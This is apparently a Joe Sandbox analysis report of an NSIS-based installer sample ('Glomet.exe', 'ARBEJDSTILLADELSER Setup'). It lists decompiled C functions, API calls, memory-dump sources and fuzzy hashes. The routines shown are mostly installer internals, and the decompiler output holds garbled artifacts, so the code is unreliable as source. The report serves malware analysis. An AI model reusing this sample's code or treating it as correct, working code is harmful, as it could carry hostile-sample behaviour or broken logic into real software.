                                                                                                                                                                              • Instruction Fuzzy Hash: 61016270640209FBEF209F60DE09EEE3769EB04344F008039FA06B51D0DBB89955CF59
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                              			E004027E8(int __ebx) {
                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                              				void* _t29;
                                                                                                                                                                              				long _t37;
                                                                                                                                                                              				int _t49;
                                                                                                                                                                              				void* _t52;
                                                                                                                                                                              				void* _t54;
                                                                                                                                                                              				void* _t56;
                                                                                                                                                                              				void* _t59;
                                                                                                                                                                              				void* _t60;
                                                                                                                                                                              				void* _t61;
                                                                                                                                                                              
                                                                                                                                                                              				_t49 = __ebx;
                                                                                                                                                                              				_t52 = 0xfffffd66;
                                                                                                                                                                              				_t26 = E00402C39(0xfffffff0);
                                                                                                                                                                              				_t55 = _t26;
                                                                                                                                                                              				 *(_t61 - 0x78) = _t26;
                                                                                                                                                                              				if(E00405C56(_t26) == 0) {
                                                                                                                                                                              					E00402C39(0xffffffed);
                                                                                                                                                                              				}
                                                                                                                                                                              				E00405DC5(_t55);
                                                                                                                                                                              				_t29 = E00405DEA(_t55, 0x40000000, 2);
                                                                                                                                                                              				 *(_t61 + 8) = _t29;
                                                                                                                                                                              				if(_t29 != 0xffffffff) {
                                                                                                                                                                              					 *(_t61 - 0xc) =  *(_t61 - 0x24);
                                                                                                                                                                              					if( *(_t61 - 0x20) != _t49) {
                                                                                                                                                                              						_t37 =  *0x42f434;
                                                                                                                                                                              						 *(_t61 - 0x30) = _t37;
                                                                                                                                                                              						_t54 = GlobalAlloc(0x40, _t37);
                                                                                                                                                                              						if(_t54 != _t49) {
                                                                                                                                                                              							E0040336B(_t49);
                                                                                                                                                                              							E00403355(_t54,  *(_t61 - 0x30));
                                                                                                                                                                              							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x20));
                                                                                                                                                                              							 *(_t61 - 0x38) = _t59;
                                                                                                                                                                              							if(_t59 != _t49) {
                                                                                                                                                                              								E00403143( *(_t61 - 0x24), _t49, _t59,  *(_t61 - 0x20));
                                                                                                                                                                              								while( *_t59 != _t49) {
                                                                                                                                                                              									_t60 = _t59 + 8;
                                                                                                                                                                              									 *(_t61 - 0x8c) =  *_t59;
                                                                                                                                                                              									E00405DA5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                                                                                                                              									_t59 = _t60 +  *(_t61 - 0x8c);
                                                                                                                                                                              								}
                                                                                                                                                                              								GlobalFree( *(_t61 - 0x38));
                                                                                                                                                                              							}
                                                                                                                                                                              							E00405E91( *(_t61 + 8), _t54,  *(_t61 - 0x30));
                                                                                                                                                                              							GlobalFree(_t54);
                                                                                                                                                                              							 *(_t61 - 0xc) =  *(_t61 - 0xc) | 0xffffffff;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              					_t52 = E00403143( *(_t61 - 0xc),  *(_t61 + 8), _t49, _t49);
                                                                                                                                                                              					CloseHandle( *(_t61 + 8));
                                                                                                                                                                              				}
                                                                                                                                                                              				_t56 = 0xfffffff3;
                                                                                                                                                                              				if(_t52 < _t49) {
                                                                                                                                                                              					_t56 = 0xffffffef;
                                                                                                                                                                              					DeleteFileA( *(_t61 - 0x78));
                                                                                                                                                                              					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                                                                                                                              				}
                                                                                                                                                                              				_push(_t56);
                                                                                                                                                                              				E00401423();
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t61 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}

                                                                                                                                                                              APIs
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402849
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402865
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004028A4
                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 004028B7
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028D3
                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028E6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                              			E00404B1D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                              				char _v36;
                                                                                                                                                                              				char _v68;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                              				void* _t29;
                                                                                                                                                                              				void* _t31;
                                                                                                                                                                              				void* _t32;
                                                                                                                                                                              				void* _t41;
                                                                                                                                                                              				signed int _t43;
                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                              
                                                                                                                                                                              				_t21 = _a16;
                                                                                                                                                                              				_t51 = _a12;
                                                                                                                                                                              				_t41 = 0xffffffdc;
                                                                                                                                                                              				if(_t21 == 0) {
                                                                                                                                                                              					_push(0x14);
                                                                                                                                                                              					_pop(0);
                                                                                                                                                                              					_t22 = _t51;
                                                                                                                                                                              					if(_t51 < 0x100000) {
                                                                                                                                                                              						_push(0xa);
                                                                                                                                                                              						_pop(0);
                                                                                                                                                                              						_t41 = 0xffffffdd;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t51 < 0x400) {
                                                                                                                                                                              						_t41 = 0xffffffde;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t51 < 0xffff3333) {
                                                                                                                                                                              						_t50 = 0x14;
                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                              						_t22 = 1 / _t50 + _t51;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t23 = _t22 & 0x00ffffff;
                                                                                                                                                                              					_t53 = _t22 >> 0;
                                                                                                                                                                              					_t43 = 0xa;
                                                                                                                                                                              					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                                                                                              					_t47 = 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t29 = E004062EA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                                                                                              				_t31 = E004062EA(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                                                                                              				_t32 = E004062EA(_t41, _t47, 0x42a890, 0x42a890, _a8);
                                                                                                                                                                              				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                                                                                              				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                                                                                                                                                                              			}




















                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(ARBEJDSTILLADELSER Setup: Installing,ARBEJDSTILLADELSER Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                                                                                                                              • wsprintfA.USER32 ref: 00404BC3
                                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 00404BD6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                              • String ID: %u.%u%s%s$ARBEJDSTILLADELSER Setup: Installing
                                                                                                                                                                              • API String ID: 3540041739-135139484
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                              			E00401D65(void* __ebx, void* __edx) {
                                                                                                                                                                              				struct HWND__* _t30;
                                                                                                                                                                              				CHAR* _t38;
                                                                                                                                                                              				void* _t48;
                                                                                                                                                                              				void* _t53;
                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                              				long _t61;
                                                                                                                                                                              				void* _t65;
                                                                                                                                                                              
                                                                                                                                                                              				_t53 = __ebx;
                                                                                                                                                                              				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                                                                                                              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                                                                                                              				} else {
                                                                                                                                                                              					E00402C17(2);
                                                                                                                                                                              					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t55 =  *(_t65 - 0x1c);
                                                                                                                                                                              				 *(_t65 + 8) = _t30;
                                                                                                                                                                              				_t58 = _t55 & 0x00000004;
                                                                                                                                                                              				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                                                                                                              				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                                                                                                              				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                                                                                                              				if((_t55 & 0x00010000) == 0) {
                                                                                                                                                                              					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t38 = E00402C39(0x11);
                                                                                                                                                                              				}
                                                                                                                                                                              				 *(_t65 - 8) = _t38;
                                                                                                                                                                              				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                              				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                                                                                                              				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                                                                                                              				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                                                                                                              					DeleteObject(_t48);
                                                                                                                                                                              				}
                                                                                                                                                                              				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                                                                                                              					_push(_t61);
                                                                                                                                                                              					E004061B5();
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t65 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}












                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                              • Opcode ID: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                                                                                                                              • Instruction ID: 4973ce5daa8367ce9871db5c73950c0598185a6d8b35e77b8380d9c424f967d4
                                                                                                                                                                              • Opcode Fuzzy Hash: aac179cc4a1ea37f398950429777a32d29ab910b0ca69bec431bc59fb76cd7ad
                                                                                                                                                                              • Instruction Fuzzy Hash: E3213B72E00109AFDF15DFA4DD85AAEBBB5EB48300F24407EF901F62A0DB789941DB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                              			E00401C1F(void* __eax, void* __ecx) {
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              
                                                                                                                                                                              				 *((intOrPtr*)(__ecx + 0x78358906)) =  *((intOrPtr*)(__ecx + 0x78358906)) + __ecx;
                                                                                                                                                                              				_push(cs);
                                                                                                                                                                              				 *0x97e90040 =  *0x97e90040 + 0x97e90040;
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}





                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                              • String ID: !
                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                              • Opcode ID: 7410f7b0bd0c18f2c64b82a674c0cf8743cbf67753a72bc4eeed8c085ede368e
                                                                                                                                                                              • Instruction ID: 6f3743f7751afa272f16232aa57a2a55c405f629e638bed5de0fb5cae73960b7
                                                                                                                                                                              • Opcode Fuzzy Hash: 7410f7b0bd0c18f2c64b82a674c0cf8743cbf67753a72bc4eeed8c085ede368e
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31A071948208BEEB059FB5DA86AAD7FB0EF84304F20447EF101F61D1D6B98981DB28
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405BE9(CHAR* _a4) {
                                                                                                                                                                              				CHAR* _t7;
                                                                                                                                                                              
                                                                                                                                                                              				_t7 = _a4;
                                                                                                                                                                              				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                                                                                                                              					lstrcatA(_t7, 0x40a014);
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t7;
                                                                                                                                                                              			}





                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BEF
                                                                                                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A0,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 00405BF8
                                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C09
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 2659869361-3916508600
                                                                                                                                                                              • Opcode ID: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                                                                                                                              • Instruction ID: 3e3e415651ec8bc6573efeb1b95b99caa1af1f852236f091574545f75c3ac81b
                                                                                                                                                                              • Opcode Fuzzy Hash: 78cba1d5cb2474798914f87c9b537ab1510ee16986e2efd06177e80df85e38b2
                                                                                                                                                                              • Instruction Fuzzy Hash: 15D02362609634BBE20137154D05EDF194C8F0335070504BBF100B31A1C77C4C1147FD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00402EA8(intOrPtr _a4) {
                                                                                                                                                                              				long _t2;
                                                                                                                                                                              				struct HWND__* _t3;
                                                                                                                                                                              				struct HWND__* _t6;
                                                                                                                                                                              
                                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                                              					__eflags =  *0x429448; // 0x0
                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                              						_t2 = GetTickCount();
                                                                                                                                                                              						__eflags = _t2 -  *0x42f42c;
                                                                                                                                                                              						if(_t2 >  *0x42f42c) {
                                                                                                                                                                              							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402E25, 0);
                                                                                                                                                                              							 *0x429448 = _t3;
                                                                                                                                                                              							return ShowWindow(_t3, 5);
                                                                                                                                                                              						}
                                                                                                                                                                              						return _t2;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						return E0040669F(0);
                                                                                                                                                                              					}
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t6 =  *0x429448; // 0x0
                                                                                                                                                                              					if(_t6 != 0) {
                                                                                                                                                                              						_t6 = DestroyWindow(_t6);
                                                                                                                                                                              					}
                                                                                                                                                                              					 *0x429448 = 0;
                                                                                                                                                                              					return _t6;
                                                                                                                                                                              				}
                                                                                                                                                                              			}







                                                                                                                                                                              APIs
                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402EBB
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402ED9
                                                                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F04
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                              • Opcode ID: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                                                                                                                              • Instruction ID: d6c9869078f7173a9f6fd6f2732e3e3a433b8c8c07e8cf938b477ca654505681
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b1e02df2a5da4039d6b12178acb40621d70ebca526a36ee1d8f5fcc3c5ae34a
                                                                                                                                                                              • Instruction Fuzzy Hash: 30F05E30645620ABC6317BA0FE8C99B7B64A704B12BA1043AF101F22E4CA7408878BED
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                              			E00405CD7(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                              				int _t11;
                                                                                                                                                                              				signed char* _t12;
                                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                              				void* _t22;
                                                                                                                                                                              
                                                                                                                                                                              				E00406257(0x42bc98, _a4);
                                                                                                                                                                              				_t21 = E00405C82(0x42bc98);
                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                              					E00406535(_t21);
                                                                                                                                                                              					if(( *0x42f438 & 0x00000080) == 0) {
                                                                                                                                                                              						L5:
                                                                                                                                                                              						_t22 = _t21 - 0x42bc98;
                                                                                                                                                                              						while(1) {
                                                                                                                                                                              							_t11 = lstrlenA(0x42bc98);
                                                                                                                                                                              							_push(0x42bc98);
                                                                                                                                                                              							if(_t11 <= _t22) {
                                                                                                                                                                              								break;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t12 = E004065CE();
                                                                                                                                                                              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                                                              								E00405C30(0x42bc98);
                                                                                                                                                                              								continue;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								goto L1;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						E00405BE9();
                                                                                                                                                                              						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t18 =  *_t21;
                                                                                                                                                                              					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                                                              						goto L1;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						goto L5;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				L1:
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}









                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00000400,00403556,ARBEJDSTILLADELSER Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(?,?,0042BC98,0000000B,00405CEE,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405C90
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                                                                                                                                • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                                                                                                                              • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\,"C:\programdata\Glomet.exe" ), ref: 00405D2A
                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\), ref: 00405D3A
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CD7
Memory Dump Source
• Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 3248276644-3916508600
                                                                                                                                                                              • Opcode ID: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                                                                                                                              • Instruction ID: 961b8afdf15cf8a693d93a37420b81600cf3221e3748574004b2986df105c153
                                                                                                                                                                              • Opcode Fuzzy Hash: 29467e021e5a5cbfdb50d3ef3054caf9b3e4a2c2be32e2e0e67c19f10da5a835
                                                                                                                                                                              • Instruction Fuzzy Hash: 01F02D25108E6526E62632391D09AAF0645CD93324759453FFCA2762C1DB3C89439E6D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                              			E004052EC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                              				int _t11;
                                                                                                                                                                              				int _t15;
                                                                                                                                                                              				long _t16;
                                                                                                                                                                              
                                                                                                                                                                              				_t15 = _a8;
                                                                                                                                                                              				if(_t15 != 0x102) {
                                                                                                                                                                              					__eflags = _t15 - 0x200;
                                                                                                                                                                              					if(_t15 != 0x200) {
                                                                                                                                                                              						_t16 = _a16;
                                                                                                                                                                              						L7:
                                                                                                                                                                              						__eflags = _t15 - 0x419;
                                                                                                                                                                              						if(_t15 == 0x419) {
